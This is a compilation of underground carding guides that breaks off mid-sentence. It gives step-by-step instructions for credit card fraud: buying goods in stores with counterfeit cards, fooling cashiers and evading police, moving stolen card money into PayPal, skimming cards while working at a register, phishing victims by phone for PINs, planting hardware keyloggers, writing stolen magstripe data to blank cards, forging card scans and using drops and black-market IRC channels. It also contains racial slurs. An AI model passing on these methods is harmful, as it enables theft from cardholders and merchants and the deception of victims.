part-Look like you should be buying what your carding,,if your trying to card expensive jewelry +and your pants are sagging down around your ass the only thing your leaving that store with is a matching +set of silver braclets and a free ride to county. Like it or not your an actor now and think of your clothes +as props and dress according to where you are working. +Only use nice shiny new cards if you want the cashier to look at your ID very carefully,,a new card could +have just been stolen from a mail box. So,,,rub it a couple times with light sand paper from side to side on +the front and back to mimic looking like it's been swiped a few times. +Get a wallet with a flipout holder to put your ID in so there is never an excuse for it to leave your hands +and never carry more than 4-6 cards in a wallet at one time--just draws extra attention you don't need. +Carding-it's time to see how good an actor you are.You need to act like this is your card. Whatever +happens this is your card and you need to stay calm. So,it's time to start working on your social +engineering skills. The quickest way to get a person to drop their guard and get them to trust you is with a +good sense of humor and a smile.These cashiers see it all in the 8hrs of misery that is a normal workday +for them. So,get them smiling and laughing and that pos terminal could say you just killed someone and +the cashier could care less. In the entire time I've been doing this I manage to encode the wrong dump +onto matching plastic twice and I remember both times vividly.Firsst time the cashier still had the card in +her hand when message popped up incorrect last four. We were allready laughing about something else +and I just said "Good thing your computer waited until closing to crap out on you,,try this one and if there +is still a problem with it I can just write a check and all she said was as long as it lasted long enough for +her to ring out with in 5 min she didn't care". Second time was on a saturday morning and I had the card +still in my hand and read it off and that same error code for wrong last four popped out and all I said +was"it finally happened I drank so much last night that I forgot how to read and oh shit that was the +wrong card anyways,,no money on it" Remember guys only criminals run and these guys aren't cops they +CAN'T touch you unless you hit first,,all they can do is folllow you and call the cops. +Avoid hitting small chain stores more than one day in a row- They WILL fax out your photo to other +stores in the area if you hit them repeatedly +I don't care how many of the same chain store you've been in and they don't check last four-if your +carding in a new town and going to that same chain--use matching plastic. If they have been hit hard +before or are in a town with a high crime rate,,they will be checking and avoid the stores in ghettos-your +just asking for trouble there. +If you notice the cashier has forgot to charge you for something--point out the mistake and get them to fix +it! The last thing you want is to be wallking out the door and have the cashier come out after you,,because +they just noticed the mistake and now you can go back in and try your luck again or give it back with +possibly your finger prints on it. +Now for the not so nice shit--if you ever get pulled over by the cops and they ask to search your car you +say NO everytime they ask you say NO! They say they have you on video using a stolen card,,blah-blah. + +You say NO. They can't arrest you without PROOF of a crime. And there is no way the cardholder has +been down to file a police report within the same day you were using the card.And they can't search your +property without a warrant. So, as long as there is nothing illegal on you they can arrest you for when +they pat you down or anything in their computer on you,,your going home that night and allways put shit +in your trunk,out of sight that way they can't say the so called stolen property was in plain sight,,allways +use the trunk. And don't lie to them! Remember these statements "Really?,, I don't remember that" or "if +you say so,,I don't remember" or if your a really greasy shit like me,,you pull out your lawyers business +card and tell them any questions other than those need to identify you should be asked to him. +Lastly NEVER-EVER emboss and encode the card holders real name and info on a card! I cannot stress +this fact enough! If the feds catch you with these cards it is 6 months per card-consecutive! Which means +10 cards gets you 60 months in club fed,,where if the cardholder name was fake you might have gotten +off with plea deal of time served and probation with restitution. +Good luck noobs and stay safe +Instore Carding Actions +In-Store Carding, the art of using conterfeit credit cards in order to obtain merchandise from stores. This +article is for education only and to make those gain more knowledge +-------------------------------------------------- +/Instore Carding Tips, Tricks, +-------------------------------------------------- +"First things first:" +as trustfunded wrote, "this is your card", this is rule number one. you must convince yourself that this is +your card. being paranoid, scared, or nervous is a perfect way to get busted and tip off a clerk or any +employee of a store. you must appear like the ordinary customer, just like you were going to buy +something legit. it is now 2006, the days of dumps working for weeks without a problem are not that +common. banks are becoming more secure and pushing new methods of fraud tracing out all the time. +this will not go into how to encode dumps or talk about where to get them. refer to the forum to find this +kind of stuff. +"security, the swipe, +when you go out to card instore it can go two ways. you can succeed or fail. if you succeed you will most +likely be outside of the store without handcuffs on and some free shit in hand. if you fail, maybe you got a +decline, call for auth, or maybe in the back of the police cruiser. +1. Keep your guard up: +personal security is the most important thing about pulling off one of these operations. be yourself, calm +voice, do not ever say the word stole/steal/stolen/jacked/hacked in the store. you never know whos +listening to you! park away from the store, walmart has cameras outside and can see your license plate. +you may think you got away, but if the bank goes after you the FBI will damn sure see that camera feed. + +2. Talk: +don't be scared to talk to the clerks about products, or anything! if you are very shy then maybe you ought +to work on snapping out of it, being friendly with the clerk before the big swipe makes a huge difference. +if pick out a older lady throw a stupid question out there such as "hows your day been" or "has it been +busy? it has been so crowded everywhere during the holidays". maybe a young guy, "whats goin on man", +"i went to a party last night and was smashed im so tired". sound stupid? well i'll tell you first hand it isn't, +it WORKS. +3. Checkout: +when you first walk in, always scope out the register. see who is working, what kind of terminal it is (self +swipe, etc), just so you do not run into something you don't want to mess with, whatever you do, DON'T +stare over there because it might just make you look stupid or alert somebody because they believe you +want to rob them or something. +a. Standing in line +standing in line just sucks, it really does. don't keep looking behind you. keep your head straight, don't +laugh for no reason, and most importantly, do not look directly at a camera. talking is not necessary. a cell +phone might be handy or maybe you can take a look at the product your getting. +b. the "swipe" +this is the most important part of instore carding, the swipe. this is where it goes down. if you have to +hand the card over, go for it. as soon as the clerk swipes pull the hand out trick. put your hand over the +register acting like you want the card back and most of the time they'll give it back. if not, then ask. you +WANT, you NEED, you REQUIRE the card back. your prints are there so you better get it. if you self +swipe, a good trick is to swipe it and put it away as fast as possible. not fast to where your practically +going 400mph but you get the picture. this makes the clerk hesitate to ask you to see the card, compare +signatures, whatever. all mind games here. +c. the "response" +you can get many results after the swipe, here we go. +- approved +you did it, sign that electronic screen or receipt and you are on your way. walk out and get the fuck out of +there. +- declined +your cards fucked. either went too high or maybe it was a pick up. i never a clerk suspect a stolen card so +i don't know what to suggest. throw them a 2nd card or if you don't have one, ask where an atm is and say +you'll be back and just leave. +- call for authorization +tell that mother fucker you need the card back and all it means is that you went over your limit. if its self +swipe tell them you have a thing and don't like giving your card to people because your bank said to keep +it with you or some stupid excuse. calling for authorization on a card is bad news. some will just say +declined, some will actually say "whats the name of the individual", and since you don't know, you're in a +hot spot there. you can lie and say its your uncles and he told you to buy it maybe? +4. "where to go" +security is a big issue. i won't tell you all to stay away from malls because i shop there but never go back +once you did it, although they have people walking around but most of the time they are looking for shop +lifters. they have no reason to suspect you unless your banging out every store there and with a lot of +people. any person with instore experience knows about the last 4 digits of the card. some POS terminals +make the clerk type them in. if they don't match you are usually ok. tell them the bank is sending you a +new card and you are sorry. you assumed you could still use it. radio shack, circuit city, best buy, hot +topic, office depot(some), do last four. don't go there unless you spent money on matching plastic. good +places to hit are stores inside of a plaza where there basically is no security besides LE patrolling the area + +which is usually fine. gas stations are easy but they can kill the dumps in some cases. pay at the pump is a +bad idea. i would only recommend it if you were shit broke and needed gas to do more carding. don't +fucking gas up anywhere with cameras. next thing you know is you carded a brand new computer just to +get busted for 20 dollars worth of gas. +good luck to everybody, have a nice thanksgiving everyone +List sites which charge CC instantly! +https://secure.hulu.com/plus/buy http://www.anchorfree.com/ Steampowered.com Onlive.com vudu.com +http://www.tmlewin.co.uk/ http://www.gak.co.uk/ Ea.com www.headblade.com zappos.com +facebook.com http://www.bigfishgames.com/ Store.origin.com woot.com +Money from cc to your paypal account +I'll tell you, how to transfer money from stolen cc to your PP account. +There is no nothing hard. +1) Open your paypal +2) Go to Profile -> My Saved Buttons +3) Create Button than a certain amount and copy code for email or integrating button on web page. +4) Found good cc for pp or used hacked account with cc added. +5) Click on Button which was integrated on web page and open checkout page. +6) Used good sock and make payment form cc or hacked pp account. +If everything will be ok, in your account will come money. + +Money from cc to your paypal account [Quick Tutorial] +I'll tell you, how to transfer money from stolen cc to your PP account. +There is no nothing hard. +1) Open your paypal +2) Go to Profile -> My Saved Buttons +3) Create Button than a certain amount and copy code for email or integrating button on web page. +4) Found good cc for pp or used hacked account with cc added. +5) Click on Button which was integrated on web page and open checkout page. +6) Used good sock and make payment form cc or hacked pp account. +If everything will be ok, in your account will come money. +More Carding Terms +-CC's that start with number 3xxx-xxxx-xxxx-xxxx are AMEX (or AmericanExpress) and their cvv2 is +with 4 digits (some RARE times with 3) +-CC's that start with number 4xxx-xxxx-xxxx-xxxx are VISA and their cvv2 is with 3 digits +-CC's that start with number 5xxx-xxxx-xxxx-xxxx are Mastercard and their cvv2 is with 3 digits +-CC's that start with number 6xxx-xxxx-xxxx-xxxx are Discover(or Novus) and their cvv2 is with 3 digits +(some RARE times with 4) +------------------------------------------------------------------------- +Bank-emitent (Issuing bank) - bank which has issued the card +Billing address - the card owner address +Drop - innerman. His task is to receive the money or goods and, accordingly, to give the part of the +earnings to you. +Biling - office, which has agreement with a bank. Also this office assumes payments for the cards. +Card bill - it's a Bank emitent card bill. +Bank-equirer - bank, in which the store opens the account. +Merchant account - bank account for accepting credit cards. +Merchant Bank - bank, through which occur the payments between the buyer and the salesman +(frequently it is used as synonym "bank-equirer"). +Cardholder - owner of the card. + +Validity - suitability card using. +White plastic - a piece of the pure plastic, where the information is plot. +CR-80 - rectangular piece of pure white plastic (without the drawing image) with the size of a credit card +with the magnetic strip. +Transaction - charege to the credit card +POS terminal (Point Of Sale terminal) - reading card device, which stands at commercial point. +PIN-code - the sequence, which consists of 4-12 numbers. It is known only to the owner of card. By +simple words password for the work with ATM and so on. +AVS - the card owner address checking. It is used for the confirmation of the card belonging exactly to its +holder. +"Globe" - card holographic gluing with the image of two hemispheres (MasterCard). +Pigeon (hen) - card holographic gluing with the image of the flying pigeon (VISA). +Reader - information reading device for the readout from the magnetic strip of card. +Encoder - read/write device for the magnetic track of the card. +Embosser - card symbol extrusion device. +Card printer - card information printing device. +Exp.date - card validity period. +Area code - the first of 3 or 6 numbers of the card owner phone. +CVV2, cvv, cvn - 3 or 4 additional numbers, which stand at the end of the number of card. +ePlus - program for checking the cards. +BIN - first 6 numbers of the card number due to those it is possible to learn what bank issued out the card +and what is the type of this card (ATM-card, credit, gold, etc.). Synonym of word "Prefix". +Chargeback - the cardholder's bank voids the removal of money from its card. +Dump - information, which is written to the magnetic strip of the card, it consists of 1,2 or 3 tracks. +Track (road) - a part of the dump with the specific information. Every 1-st track is the information about +the owner of the card, 2-nd track - information about the owner of card, about the bank issued the card, +etc. 3-rd track - it is possible to say - spare, it is used by stores for the addition of the points and other. +Slip - synonym to the word "cheque" (conformably to card settlings). +Card balance - money sum that finding on the card account. +MMN Mothers Maiden Name, important if you want to change the billing address +some terms: +Automated Clearing House (ACH) - the automated clearing house. The voluntary association of + +depositors, which achieves clearing of checks and electronic units by the direct exchange of means +between the members of association. +Continuous Acqusition and Life-cycle Support (CALS) - the integrated system of the production +guaranteeing, purchase and expluatation. This system makes possible to computerize all data about the +design, development, production, servicing and the propagation of the production. +Debit Card - Card, which resembles the credit card by the method of using, but making possible to realize +direct buyer account debiting at the moment of the purchase of goods or service. +Delivery Versus Payment (DVP) - the system of calculations in the operations with the valuable papers, +which ensures the mechanism, which guarantees that the delivery will occur only in the case of payment +and at the moment of payment. +Direcht debit - payment levy method, mainly, with the repetitive nature (lease pay, insurance reward, etc.) +with which the debitor authorizes his financial establishment to debit his current account when obtaining +of calculation on payment from the indicated creditor. +Electronic Fund Transfer (EFT) - the remittance of means, initiated from the terminal, telephone or +magnetic carrier (tape or diskette), by transfer of instructions or authorities to financial establishment, that +concern to the debiting or crediting of the account (see Electronic Fund Transfer/Point of Sale - +EFT/POS). +Electronic Fund Transfer/Point of Sale - EFT/POS - debiting from the electronic terminal, for the means +transfer purpose from the account of a buyer into the payment on the obligations, which arose in the +course of transaction at the point of sale. +Integrated Circuit (IC) Card - It is known also as chip card. Card equipped with one either several +computer micros-chip or integrated microcircuits for identification and storing of data or their special +treatment, utilized for the establishment of the authenticity of personal identification number (PIN), for +delivery of permission for the purchase, account balance checking and storing the personal records. In +certain cases, the card memory renewal during each use (renewed account balance). +Internet - the open world communication infrastructure, which consists of the interrelated computer +networks and which provides access to the remote information and information exchange between the +computers. +International Standardisation Organisation (ISO) - International organization, which carries out +standardization, with the staff office in Geneva, Switzerland. +Magnetic Ink Character Recignition (MICR) - System, which ensures the machine reading of the +information, substituted by magnetic inks in the lower part of the check, including the number of check, +the code of department, sum and the number of account. +RSA - the coding and autentification technology, developed in 1977 in MIT by Rivest, Shamir and +Adel'man, which subsequently opened their own company RSA Data Sechurity, Inc., purchased recently +by the company Security Dynamics Technologies, Inc. +Real-Time Gross Settlement (RTGS) - the payment method, with which the transfer of means is achieved +for each transaction in obtaining of instructions about the payment. Decrease the risk with the payment. +SSN (Social Security Number) - nine-digit number issued in US only to an individual. Its primary +purpose is to track individuals for taxation purposes. +Smart Card - card equipped with integrated circuit and microprocessor, capable to carrying out the +calculations. + +System risk - the risk, with which the incapacity of one of the payment system participants either +financial market participants as a whole to fullfill their obligations causes the incapacity of other +participants or financial establishments to fulfill its obligations (including obligations regarding the +realization of calculations in means transfer systems) properly. This failure can cause significant liquidity +or crediting problems and, as result, it can cause loss to the stability of financial markets (with the +subsequent action on the level of economic activity). +Truncation - procedure, which makes it possible to limit the physical displacements of a paper document, +in the ideal version, by the bank of the first presentation, by the replacement by electronic transfer of +entire or part of the information, which is contained on this document (check). +Tipper - a machine designed for use with PVC plastic cards to create raised print. (basically a plastic card +embosser) +COB - Change of billing. Used for online carding, to change the billing address of a card since Online +Stores will only ship large items if the billing and shipping address match. You can obtain these from +vendors in CP. Once you have this, you can easily change the card address to that of your drop so that the +stores ship items to your drop, since the billing and shipping addresses will match. +DOB - Date of birth of the card owner +My Carding Experience +This is a creepcentral publication +Carding: Carding: Online, Instore, Going through vendors and advice, Phishing for change of billing +addresses +Including drops and what you need to know;Huge guide written by me +kay major updates done to this carding text, it will cover the basics of most carding knowledge. Going +into absolutely everything would mean having to go onto ID theft and fake IDs which can be classed as 2 +different categories of their own. +What I'm going to cover: +Online Carding +- A quick overview of what online carding is +- SOCKS and why we use them +- Finding a cardable site and what cardable means +- Carding "non cardable websites" with fake CC scans and other fake documents +Carding while on the job +- Getting CC, CVV, CVV2 through use of mobiles +- Skimming whilst on the job +- Using carbonless receipts to get details (pretty outdated method) +Trashing +- Trashing for receipts and credit reports (pretty outdated although still works) +Phishing over the phone + +- Phishing over the phone for details +Keylogging for CVV2s +- Hardware keylogging +Carding Instore +- What instore carding is (very brief) +- How it's done +- How to act and present yourself instore +Carding over the phone +- Carding over the phone +IRC +- Services provided in IRC +- Advantages to using IRC for info +- Disadvantages +- How to find carding channels (Will not go too much into this as there are secrets between fellow carders +which we like people interested enough to find out for themselves) +- Vendors and how to approach them +- How to rip in IRC (EVERY vendor, reliable or not has ripped some n00b who acted like they knew +what they were doing) +::::WU BUG BULLSHIT and how to rip n00bs and gain more:::: +Phishing for Change of billing +- What COB is and why it's useful +- Use through phishing pages +- Use through keylogging +Drops and what you need to know about them +- Drops and what you need to know about them +[b]What carding is[b] +Carding summed up quickly is the act of obtaining someone's credit card information, from the CC#, +CVV, CVV2, CVN, and the billing address, along with the expiry date and name of the person the card +belongs to along with a signature. +Online Carding +Online carding is the purchasing of goods done over the internet with the CVV2. +Now for you n00bies you're probably wondering what a CVV2 is, it's simply just the database of basic +info for the card such as the card type (e.g. Mastercard) First and last name, address and post code, phone +number of the card owner, the expiry date (and start date if it's a debit card or prepaid CC), the actual CC +number and the CVC (card verification code, which is the 3 digits on the back of the card). +This is the format you usually get them in when you buy off IRC: +:::MC ::: Mr Nigerian Mugu ::: 1234567890123456 ::: 09|11 ::: 01/15 ::: 123 ::: 123 fake street, +fakeville, ::: Fake City ::: DE24 TRH ::: 01234-567890 ::: +SOCKS and why we use them +Now with ANY fraud at all you have to take precautions so you don't make it easy for anyone to catch +you in your wrong doings. As usual I swear against TOR for carding/scammin because most nodes are +blacklisted by websites and because TOR cycles through various different proxies; and even if you +configure it to go straight through an exit node of your choice it's still not worth it. You can use JAP but +make sure you're using some constant sock proxies from the same city, town or area that the card is from; +also go wardriving and use a VPN (don't trust anyone off IRC with these, you'll have to do some +searching around yourself for a highly trusted one and one which won't comply with LE). + +You can get good SOCKS from anyproxy.net (people are selling accounts for the site in IRC all the time), +that's the best place but even I ended up losing the account eventually (unknowingly I was sharing it with +some Nigerian dude who became selfish). +So we use SOCKS because they stay constant. But don't let that get your guard down, you want FRESH +proxies everytime you card. +Finding a cardable site and what cardable means +Basically a cardable site holds these characteristics and what you should be looking for to determine an +easily "cardable" website: +- The top one you need to look for on the site's TOS is that they send to any address and not just the one +registered on the card (although you can easily get around this if they don't, with a COB, photoshopped +verification (will go into detail later) or some social engineering over the phone). +- The next important to look for is if they have a visa verification code or mastercard secure code (most of +the time if you ask your vendor they'll include them in your CVV2 details textfile), if they do have one of +these you have to put in and you don't have them then don't waste your time +- If they ship internationally (for obvious reasons, but you can just stick to local websites and order to +your local drop) +- If they leave packages at the door when no one's in, or around the back in a safe area (I know of one site +in the UK that has all these qualities including this one, it is perfect for carding clothes) +- Also you can't forget to see what other security checks they need to do (if they need to call you up to +verify or want a utility bill, passport or a scan of the actual CC) +It is hard to find websites online now that have most of these qualities, therefore we have to use COBs +and photoshop to help us along the way, which is what I'll go into now. +Carding "non cardable websites" with fake CC scans and other fake documents +Okay so say you come across a site that will deliver to another house not registered on the card, but they +want verificaton either through phone or scans of a utility bill, credit card or passport. +For this you'll want to get a pay as you go deal for a cheap shitty mobile all in fake details (say a nokia +3210, brick LMAO!), or you can use spoofcard.com to your advantage to help you. Hell if the person's +details you're using is local to you and you're daring then go to their home and beige box from there; it'd +be very convincing. +If they speak to you over the phone have all details in your mind about the item you're carding, have some +bullshit story if you're having it sent to a diff address such as a family member's birthday and you need it +there as quick as possible as it's a last minute thing, or some shit like that. If you're carding multiple sites +at the same time it's easy to get them mixed up, so make sure who it is calling you 1st. +For CC scans and how to do them check the attachments at the end of this file, they explain so much +better than I could. How you use them is once you've made them like the tuts have said to do, you then tilt +them a little bit so it does actually look like a scan. To make it even more believable put some paper in the +scanner (dark shade if you must), scan it and open in photoshop and then put the shopped CC scan of the +front onto it and then do the same with the back, then send the scans to them via e-mail or post. Same +goes for utility bills (can be got through trashing or your own, and then edited in PS). +Do not use the same designs when making your CC scans, otherwise it will become too obvious. To give +you a head start on mastercards (what I recommend for n00bs to go for) I'm giving you a globe hologram +image so you won't have to buy them in IRC; unfortunately all of my visa hologram pics are shit, but I'm +working on getting a good one soon. +Carding whilst on the job +Getting CC, CVV, CVV2 through use of mobiles + +Believe it or not giving your information out to anyone anywhere is not a wise choice, you can not trust +anyone in this day and age. Yes there are carders working on the inside in places where there are a lot of +people around flashing off their plastic cash and using them freely without a care in the world. The most +common of places for a carder to work at are brand label clothing stores such as Limey's, Charlie Brown's +and all the other trendy shops. +Ever noticed when yourself or someone else has paid at the desk with a debit card or credit card that they +bring out a keypad from under the desk, then put your card into it and have the buyer input the pin? Think +again when they take your credit card and go under the desk with it to get the keypad, they are doing +more than just that; just because they're not taking the card and running off with it does not mean they're +not stealing your information. A friend of my dad used to card and work in a clothing store, he used to +have a piece of play doh stuck under the desk and he used to press the card onto the piece of play doh, +unfortunately he began doing it too much and because he'd gotten away with it so many times he became +careless and got caught out by a co worker and from what I know he is still doing time. The moral is, be +careful with the play doh method. The unfortunate thing is you can only get the full info of 2 cards at the +max, and you don't know exactly if you're pressing over the info of another card already put on to the play +doh. Also you can't get the CVC through this method, I was just giving a classic example from the olden +days. +But there is a new wonderful invention called cameras, video recording, and mobile phones and they are +even all working on the same thing. It's best to test it out 1st and have a camera on your phone that is at +least over 2 megapixel and allows long enough video recording times. The phone is set to video record +and on a lighting if needed, and taped underneath the desk for you to record both sides of the card for all +the information you need, as well as being quick you can get a lot more than 2 on, depending on how long +each recording lasts, you may need to start more than one recording. +You need good reason to be going under the desk to get the chip and pin machine, so make the desk look +cluttered up and put shit in the way of everything, such as coat hangers and various other items; or you +could just flat out bullshit the customer and say that the chip and pin machine on the desk isn't working so +you need to get the other one, take their card and then go under searching the desk and quickly show it to +the camera phone and then get the chip and pin machine and put the card in it and then hand to the +customer to put in their pin as normal, unaware you have a CVV2 to later use when shopping online. +Skimming whilst on the job +For skimming you'll want a mini portable MSR500M reader that can be fitted on your waistline belt or of +course once again under the desk, if you're a cashier. But you'll also want a MSR206 writer if you plan on +writing the tracks to an embossed CR-80 piece of plastic later (you can make these yourself but +embossers are expensive and it's an expensive procedure, so wait a while until you do that yourself and +buy them from IRC (be careful, people like to rip with plastics, or you'll get shit quality if you don't watch +out). +If you plan to just sell the dumps on IRC then that's fine, but you'll still need the PIN as well, so if you're +a waiter you can get a cheeky peek at them putting their pin into the chip and pin device while you keep +hold of it slightly (have them put the pin in while they're sat down and you're standing up). It's much +easier to skim in a restaurant rather than clothing retail, as you don't have to think it out and set it up as +much. You can keep the MSR500M in your front pocket of the uniform you're wearing and pretend to be +giving the card a clean on the sleeve (bullshit and say the device won't read it), while really you're giving +it a swipe into your reader. This way the person doesn't even get suspicious because you don't take their +card out of sight with them. I guess you could do that technique with clothing retail too when you get +their card in your dirty little hands, but peeking for the PIN is harder or you'll have to have a friend +shoulder surf for it (or if they're on the next register have them use a sony cyber shot c902 camera phone +and pretend to have them talking on the phone while really they're recording the person next to them +putting in their PIN; cybershots are really inconspicuous looking with their cameras and VERY clear +[5mpixel]). +I'll go into detail what to do with the dumps you have later in the instore carding section. + +Using carbonless receipts to get details (pretty outdated method) +If the store you work at hasn't gone carbonless on the transactions information then you can get most of +the info from the receipt you get a copy of for yourself and note down the pin on this as well when/if you +get it. +Trashing +Trashing for receipts and credit reports (pretty outdated although still works) +Ever heard the expression "Another man's trash is another man's gold"? That's exactly what this is. You'd +be surprised how many people haven't heard of a paper shredder or bonfire. They just dump their +financial records containing SSN's/NI, full name, address, bank, credit card number, CVV, CVV2 etc. All +on forms people couldn't be bothered to dispose of properly because they thought they were JUST old +records. Again carders wok on the inside again for when they want to do trashing, a lot of janitors wear +rags but you'd be surprised how secretly rich most of them are (along with the other shit they steal from +work as well). But also from this if there is not enough info for you on the forms then there is definitely +the phone number of the mark on the form that they've scrapped; almost always, and if not then there is +enough info on their to look them up in the phone directory. Then of course you use social engineering +skills over the phone to get the extra info that you need. If you know of a store that is not carbonless, then +go trashing in the bins at the back of the store for the receipts with the credit card details on it. +Phishing over the phone +Phishing over the phone for details +Ever had telemarketers ask for your credit card info over the phone? (this is if you haven't already hung +up by just hearing a nigger or paki on the phone) chances are they're a carder. Believe it or not there are +people actually stupid enough to fall for these obvious scams. Even more people fall for this if they +believe that the caller is from the credit card company itself or part of the secret service or credit fraud +investigations; the FBI, CIA and police have nothing at all to do with credit card fraud believe it or not. If +you sound professional or part of an important group such as investigations then people are more likely to +comply with you if they believe that their card has been used for credit fraud purposes and have to give +their credit card info and billing address for verification. The best time to call up the mark is when they +are at work as it'll take them by surprise and they'll be wanting to get it sorted asap so that they can get +back to work. Also if it's "serious" then the secret service don't wait for you to finish work before they +question you. Play along well to the part you're pretending to be. Some social engineering skills are +required and you must gain the experience of lying to people yourself. Before calling up the person find +out as much information about them as you can. +If you've stolen a CC from someone personally you can call them up pretending to be their bank and tell +them there has been some suspicious charges made to the credit card from places such as South Africa, +Nigeria, Turkey, Russia; places like that, get them to confirm their details (milk as much as you want out +of them, ask them bullshit security questions such as their mother's maiden name, address, etc; you may +as well, it'll make it easier to get a COB for you to use). +You can also get their PIN out of them if you want as well by either straight out asking them to confirm +it, or be crafty and after you've told them to verify their PIN you're putting them through to a different +department; then play some cheesy music down the phone for a few mins, have a female voice recording +(use AV vocie changer) asking them to input their PIN on their dialpad (this won't be as suspicious); get +these recorded so they can be decoded with DTMF decoding hardware/software later (although it's +expensive). Guessing DTMF tones is pretty easy too, but you need to know what each tone sounds like, +it's preferred to use decoding software to ensure you have it correct. +If you try hard enough you can get full info about anyone over the phone (I suggest using spoofcard for +this). +Keylogging for CVV2s +Hardware keylogging +First of all it's best if you use hardware keyloggers here that you put into the keyboard of a computer + +belonging to an area where a lot of people are going online a lot and logging into e-mails, ebays, paypals +etc, pretty much giving you enough info for you to go searching through if you get in their e-mails, or +maybe you're lucky enough to get someone who is buying something online anyway. Get the keyloggers +from here: +http://tyner.com/datalogger/keykatcher.htm +And come back within 2 days time or so and collect the keylogger after doing some browsing yourself (as +to not look suspicious just coming in and then leaving a few seconds later). +Or of course you could set one up in a business and do the classic call in and do some social engineering +from the credit card company or secret service and have them go to the bank online and have them log in +to verify, or maybe even have them log in to a fake bank online made by yourself that will collect +anyone's info who logs in on it. +Carding Instore +Instore carding is the act of skimming a credit card and writing the dumps and track1+2 to a CR-80 piece +of plastic and then either cashing out at the ATM or shopping for goods instore, as long as you have the +PIN as well through whatever method you choose to use. +How it's done is through the use of thejerm software or any other magstripe utility software (thejerm is +the best to use). And you do it like this: +Written by: Acetrace +1. Load up thejerms software +2. hit settings tab +3. hit "Defaults" in Leading Zeros box +4. hit "75 bpi" in Set Track 2 density box +5. go bak to actions +6. hit LoCo or HiCo in Coercivity box, depending on which you want to do +7. input your tracks 1 & 2 (without the % ; or ? symbols because the program already does it for you) +8. hit Write Card and swipe your card. (i usually do a read card afterwards to make sure everything went +ok) +9. GO SHOPPING!!! +Download thejerm from here: +Code: +Now how you should act when you go carding instore is pretty much common sense, but some people get +caught up in the moment with nerves, cockiness or just too much weird amounts of excitement. +Simple what you do, make sure you KNOW the PIN for the card you're using before you go, don't be +stuck at the counter trying to remember it. If you're going to be carding expensive goods then dress smart +for the occasion, wear brand named clothing (that you've previously carded ) or even a suit. It would look +suspicious someone with a hoodie going into a store and buying a Louis Vuitton watch, so walk in with +style. When you go instore, you ACT like you are using your own card, because essentially that's what it +is (well it is now anyway lol) no looking shifty and don't look at the fucking cameras; the cameras mean +nothing anyway, they don't know your name or where you live, they're not being watched half of the time, +so stop worrying about the fucking cameras; remember you're doing nothing wrong. When you go in, +don't rush take your time, browse around some other items. Find the item you want to card and even ask + +the employee simple questions about it (if it's a TV or comp just ask questions about certain specs and if +it's good for playing video games on). You'll be most nervous at the checkout, just act as normal as you +always have been, don't make too much small talk but be polite and civil. Once you have the good sin +your hands don't bolt out the door, just say thank you and then casually walk out the door, get to your car +and then celebrate all you want. +The following users say "It is so good to hear it!": +Carding over the phone +Okay 1st of all do not be a dumb fuck now, do not call from your own phones at all. For extra lulz you +could use a beige box and call from someone else's phone but that's a totally different game all together +and is also a major felony to go agains tyou on the chance that you do get caught so we'll keep it simple +and use a payphone (it's not AS risky to phreak these but the only recent red box tones I have are from the +year 2007 and I'm pretty sure they'd have changed the system again...bastards, I'll check sometime though +) to call them up. Do not put on a stupid voice at all, the salesman/woman will know and it'll be a cause +for investigation during the mailing of the goods or the requesting of them. Just be calm, cool and talk to +them as you normally would if you were ordering with your own card. They'll ask for a name, name as it +appears on card, phone number, billing address, expiration date, method of shipping, and the product that +you want to buy. Also when trying to not seem so shifty be sure to ask questions such as if they can +deliver the next day or 1st class, and if they can order it to your "relatives" house so that it can be there +for their birthday; maybe even ask if they can write a message to go with the gift as well on your behalf . +The next day postage is said so that they have less time to look up details on the order. Some cards will +have difficulty shipping to any address other than the billing address, but it doesn't hurt to try. If they start +to question you then just answer the questions and talk your way around the situation with your social +engineering skills; don't just run away from the questions or hang up straight away, otherwise that is +cause for suspicion and they may investigate. If all goes well you should have your item of choice +delivered to your drop location or a house of someone else's address who you don't know and call them +up saying that you called up the store and they've sent the package to the wrong address and it is still +sending there, and ask them if they could kindly keep and sign for the package and you'll pick it up after +work (this is a last resort and only to be tried if you're good at talking to people, which you should be if +you're a carder). I recommend checking out the section on drops later on in this text. +I recommend using spoofcard for verification over the payphone, if they need to verify (if they won't send +without some verification which is usually the case). +IRC +Services provided in IRC +IRC is the main gathering for fellow carders, scam artists and rippers. To put it in a nut shell, IRC is THE +black market, unlike craigslist and eBay which are just black markets. You can get anything illegal off +IRC from CP to warez to CC details (which is what we want). +To concentrate on carding though you can buy: +CVVs +CVV2s +SSNs +Utility bill scans +CC scans +COB (a service to get someone to call up the victim's bank and get the billing address changed to your +drop) +Payment for using someone else's drop and then sending to you +Spyware +Fake ID/ ID scans +DUMPZ +Phisher pages + +The list really is endless +There are a lot of advantages to using IRC networks and channels which I'll go into now: +- The channels are often underground and not known to many people, so they're harder to stumble upon +by some random guy. +- The messages can be encrypted so they can't be read by anyone happening to be on the network sniffing +the traffic. This makes it harder for investigators to uncover. +- Easier and quicker to communicate with mass amounts of like minded people. +- Variety of channels to go to if one doesn't suit you (there are MILLIONS and new ones being made +every second, guaranteed). +- And of course a varity of services, if you need something you can bet someone from the other side of +the world will be willing to share or/and sell to you. +There are a lot of disadvantages though, IRC is the equivalent of a backstreet alley, you'll be fine if you +stay cautious, here's what you should be weary of: +- Viruses +- If you don't have strong anti viruses and firewalls you will get infected (no norton shit, kaspersky and +NOD32 are what you want) +- Do not accept random .exes or any file for that matter +- It is easy to get ripped off, choose your forms of payments and who you deal with wisely +How to find carding channels (Will not go too much into this as there are secrets between fellow carders +which we like people interested enough to find out for themselves) +Here is the most commonly asked question I get asked by n00bies and fellow carders; where do you find +these channels? +If I'm being totally honest the best place to find out about them is through Nigerians; no bullshit that is +where I found out about a lot of the carder channels I used, also how I found out about forums and their +IRCs too such as cardersplanet, darkmarket etc. How I found him out was just on a normal scam bait I +was doing, it wasn't a long one, but in the end he tried phishing me so I tried back and we had a laugh +about it; I was straight up with him and told him I wanted to get deeper into the game, I looked up to his +type of people and wanted to get rich/successful (I also shared the double claim secret about paypal with +him which got him trusting me a little bit) he then sent me an invite to cardersplanet (this site was full of +Nigerians). Eventually I went in the IRC (admittedly got ripped a few times) then started vending myself +under various diff nicknames, then moved onto different sites like darkmarket and cardingzone when I'd +got invites for them (although cardingzone is shit it's good to get in the IRC for starting off, you'll get +invited to better forums the more you hang out in IRC, trust me). Don't ask me for invites to cardingzone, +I was banned for ripping (I didn't rip anyone ) +The quicker way is to use these and search for certain keywords: +www.irclinux.org +www.irctrace.com +www.irclog.org +ircarchive.info +www.irc-chat-logs.com +http://www.irseek.com/ +And of course don't forget google. +I'm only going to give you one clue for searching through google for a carding IRC, and that word is 